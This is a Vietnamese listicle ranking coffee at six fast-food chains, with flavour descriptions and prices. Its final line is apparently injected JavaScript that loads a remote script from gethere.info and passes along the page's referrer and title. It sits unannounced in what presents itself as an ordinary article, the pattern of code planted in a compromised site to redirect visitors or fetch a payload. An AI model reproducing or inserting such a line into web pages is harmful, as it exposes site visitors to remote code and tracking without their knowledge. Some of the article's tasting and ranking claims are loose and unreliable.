Những thương hiệu cà phê kèm đồ ăn nhanh sáng giá nhất thế giới

Một chiếc bánh rán, bánh Hamburger kẹp thịt gà hay bất kì loại thức ăn nhanh nào đều thực sự phù hợp bên một tách cà phê. Những thương hiệu đồ ăn nhanh nổi tiếng tehes giới giờ đây đã có thêm một đối tác đồ uống mới ngoài nước ngọt có ga. Cà phê giúp buổi sáng lành mạnh và tỉnh táo hơn. Họ đã có thời gian thử nghiệm tập trung vào những máy pha cà phê thay vì bên những chiếc bánh nhiều dinh dưỡng. Dunkin Donuts chính là thương hiệu tiên phong cho xu hướng này, mọi người đều ưa thích cà phê của họ cũng giống như những chiếc bánh ngọt vậy.

Mỗi ly cà phê truyền thống phải đảm bảo độ tươi tương đối, có màu đen, không có đường và sữa. Những chất phụ gia có thể làm cà phê ngon miệng hơn, nhưng vẫn còn nhiều khách hàng muốn cảm nhận hương vị thực sự của thứ đồ uống này.

#6 Taco Bell

taco-bell

taco-bell2

Taco-Bell1

Như những gì mong đợi, “Live Más” đã hướng Taco Bell áp dụng chuỗi kinh doanh song song. Mas đắng là đồ uống nổi bật nhất, mang hương vị ngọt ngào của socola nhưng lại chan chát vị cà phê rừng. Dư vị này đủ khiến những người phụ nữ Mỹ phát nghiện vì nó.

Những hạt cà phê ở đây được chứng nhận là loại cà phê cao cấp làm từ 100% đậu Arabica.

Giá: $1,49

#5 Burger King

burger-king-coffee

burgerkingcoffee

Các nhân viên của Burger King từng tự hào nói rắng cà phê của họ tốt nhất Seattle, nó là sự pha trộn giữa Arabica Mỹ Latin 100% đặc trưng với vị ngọt ngào, hấp dẫn và vị đắng nhẹ của socola nguyên chất tạo hương vị cân bằng. Một cặp đôi hoàn hảo khi thưởng thức nó cạnh một miếng Burger nhân bò phô mai.

Giá: $1,39

#4 McDonald

mcdonalds

mcd_coffee

Những cốc cà phê không nắp là đặc trưng của thương hiệu đồ ăn nhanh này. Bạn sẽ nhanh chóng phải chết mê chết mệt với hương vị bùi và ngậy của Hazelnut rang. Thức uống dẫn đầu trong danh sách tại đây. Cà phê của McDonald là loại Arabica 100% với thời gian ủ là 30 phút/mẻ.

Giá: $1,29

#3 Wendy’s

wendys

wendys1

Mùi vị dễ chịu với ngụm đầu tiên tan chảy trong miệng là những gì người ta nhắc đến khi nói về cốc cà phê tại Wendy’s. Nó bóng loáng với hương vị cacao, thậm chí có cả một chút trái cây (quả việt quất). Nhiều tờ báo đã buộc tội Wendy’s không làm đúng cam kết pha cà phê với người tiêu dùng mà sử dụng đường hóa học, gây khô miệng và rát lưỡi. Tuy nhiên, những hạt cà phê Arabica 100% tại đây vẫn đắt khách. Chúng được rang ở nhiệt độ cao để đảm bảo tốt nhất hương vị, mùi thơm và màu sắc.

Giá: $0,99

#2 Dunkin Donuts

dunkin

dunkins2

Dunkin Donuts dường như rất có duyên với con số 2 khi thương hiệu này cũng nằm trong Top 5 chuỗi cửa hàng cà phê lớn nhất thế giới (No.2). Cà phê ở đây có hương vị lạ như mùi từ sữa dê (khi còn nóng) nhưng khi đã nguội nó lại trở về làm một tách cà phê truyền thống. Mặc dù không có kem hoặc đường nhưng nó rất ngọt như từ hạt óc chó.

Cà phê ở đây được trồng và phân loại một cách nghiêm ngặt, sử dụng hạt Arabia 100%.

Giá: $1,79

#1 Chick-fil-A

Chick-fil-a-coffee

chick-fil-a2

Cà phê của Chick-fil-A có vị ngọt của mật ong và khi để nguội thì hương vị chuyển sang chát nhẹ nhàng. Theo những gì tìm hiểu, hãng đồ ăn nhanh này còn có một đội ngũ thưởng thức cà phê riêng biệt.

Không chỉ dừng lại ở việc đưa thêm cà phê vào thực đơn đồ uống chính. Hãng còn tạo dựng một bộ phim ngắn riêng giới thiệu về những cốc cà phê này với sự góp mặt của nhiều nghệ sĩ đường phố và những người dân tình nguyện.

Chúng tôi sẽ cho họ thực sự tận hưởng hương vị cà phê kem caramel và ca cao ngọt – như chiến dịch tiếp thị cho loại cà phê mới với chi phí không quá lớn. Chỉ đơn giản là mất thêm hàng trăm, hàng nghìn hộp cà phê thôi mà”, Giám đốc Marketing của Chick-fil-A phát biểu.

Giá: $1,95

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;